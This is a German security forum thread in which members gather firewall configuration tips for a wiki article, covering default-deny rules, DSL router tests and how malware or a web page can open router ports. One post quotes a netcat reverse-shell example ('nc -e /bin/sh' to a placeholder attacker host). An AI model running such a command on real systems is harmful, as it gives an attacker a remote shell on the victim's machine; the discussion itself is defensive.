| (In)security allgemein Sicherheit, Anonymität im Netz. Schutz und Maßnahmen. Prävention und Konzepte. Sicherheitsarchitekturen allgemein und auf der Netzwerkebene. |
Diskussion: Tipps im Umgang mit Firewalls im Forum (In)security allgemein, in der Kategorie Security Area; Anzeige In Anlehnung an den Firewall-Beitrag aus dem HaBo-Wiki suche ich grundlegende Tipps betreffs der Einstellungen von Firewalls. Das betrifft ...
![]() |
| | #1 (permalink) |
| Member of Honour ![]() Registriert seit: 29.01.05 ![]() Likes: 0 | Anzeige In Anlehnung an den Firewall-Beitrag aus dem HaBo-Wiki suche ich grundlegende Tipps betreffs der Einstellungen von Firewalls. Das betrifft Desktopfirewalls genauso wie externe Firewalls (auch DSL-Router / DSL-Firewall / Hardwarefirewall genannt). Zudem benötige ich in diesem Zusammenhang Hinweise auf grundlegende Fehler, die bei der Verwendung von Firewalls häufig gemacht werden. Ziel ist es, daraus einen Beitrag über "Tipps im Umgang mit Firewalls" zu erstellen. Wer kann helfen? Hinweis: Dieser Thread ist das Gegenstück zum Thread ?Tipps für Systeme ohne Firewall?. Bye, nz |
| | |
| | #2 (permalink) |
| nun, ich nutze ein OpenBSD Server, der als FW konfiguriert ist. Im Serer sind 2 NWK. Modem -> 1. NWK Server / 2. NWK Server -> Switch. | |
| | |
| HaBOT | - Anzeige - |
| |
| | #3 (permalink) |
| Registriert seit: 01.10.05 ![]() Likes: 0 | Wenn man eine firewall aufstellt versucht man Regeln zu machen gegen die Angriffe de man kennt. Dass ist nicht gut. Man macht eine bessere firewall wenn man nur die Dinge die man braucht zulässt und alles andere verweigert, da man nicht alle möglichen Angriffe kennt. |
| | |
| | #4 (permalink) |
| Member of Honour ![]() Registriert seit: 29.01.05 ![]() Likes: 0 | Danke für eure Antworten. Ich habe einen ersten Entwurf für den Artikel Tipps im Umgang mit externen Firewalls ins wiki gestellt. Kritiken und Anregungen sind immer willkommen. Zudem gibt es ein Problem, was das Ganze ein wenig hinausgezögert hat: Ich habe mit einigen Freunden verschiedene Exemplare von DSL-Routern getestet. Einige unterstützen per Menü Regeln wie diese, ohne dass die Regel eine Wirkung zeigt. Es wäre sehr hilfreich, wenn ihr mir schreiben könntet, was euer DSL-Router dazu sagt. Thx. Bye, nz |
| | |
| | #5 (permalink) | |
| Registriert seit: 13.11.04 ![]() Likes: 0 | irgendwie steh ich grad auf dem schlauch. kannst du das hier noch mal in anderen worten formulieren? ich raff nicht wirklich wie dieser angriff funktioniert. Zitat:
| |
| | |
| | #6 (permalink) | |
| Member of Honour ![]() Registriert seit: 29.01.05 ![]() Likes: 0 | Zitat:
Um die Attacke besser zu verstehen, betrachte zunächst eine Malware, die auf Deinem PC installiert wurde. Baut diese Malware eine Verbindung zu ihrem Internetserver auf und gibt dabei an, die Antwort auf Port 23 zu erwarten, so kann der kontaktierte Internetserver nun auf den Telnetdienst des PCs zugreifen, da durch die Verbindungsanfrage eine entsprechende dynamische Regel im Router angelegt wurde. Genau dieser Angriff lässt sich mittels Java auch von extern ausführen. So kann also ein Internetserver über eine speziell präparierte Webpage Zugriff auf Dein System erlangen, sobald Du seine Seite im Browser aufgerufen hast. Und dass, obwohl eine externe Firewall dazwischenhängt. Bye, nz | |
| | |
| | #7 (permalink) | ||
| Registriert seit: 13.11.04 ![]() Likes: 0 | Zitat:
also der angreifer hat z.b. "nc -lvp 80" an und die malware fuehrt "nc -e /bin/sh www.angreifer.com 80" aus. danach hat der angreifer ne shell auf meinem rechner. Zitat:
sorry, vielleicht verpeil ich gerade voellig das prinzip... | ||
| | |
| | #8 (permalink) | ||
| Member of Honour ![]() Registriert seit: 29.01.05 ![]() Likes: 0 | Zitat:
Zitat:
Bye, nz | ||
| | |
| | #9 (permalink) | |
| Registriert seit: 13.11.04 ![]() Likes: 0 | Zitat:
| |
| | |
![]() |
| - Anzeige - | |
| |
| Themen-Optionen | |
| Ansicht | |
| |
Ähnliche Themen | ||||
| Thema | Autor | Forum | Antworten | Letzter Beitrag |
| Schlampiger Umgang mit Kundendaten bei der Citybank USA | sw33tlull4by | News & Ankündigungen | 9 | 03.07.08 16:22 |
| Ordentlicher Umgang | BattleMaker | Doppelte Beiträge | 2 | 22.10.06 18:59 |
| Richtiger Umgang mit IE, Outlook usw... | Orange | Windows | 5 | 26.09.05 10:30 |
| Wie lerne ich schnell den Umgang mit Linux?? | warfy` | Linux/UNIX | 8 | 04.06.03 13:41 |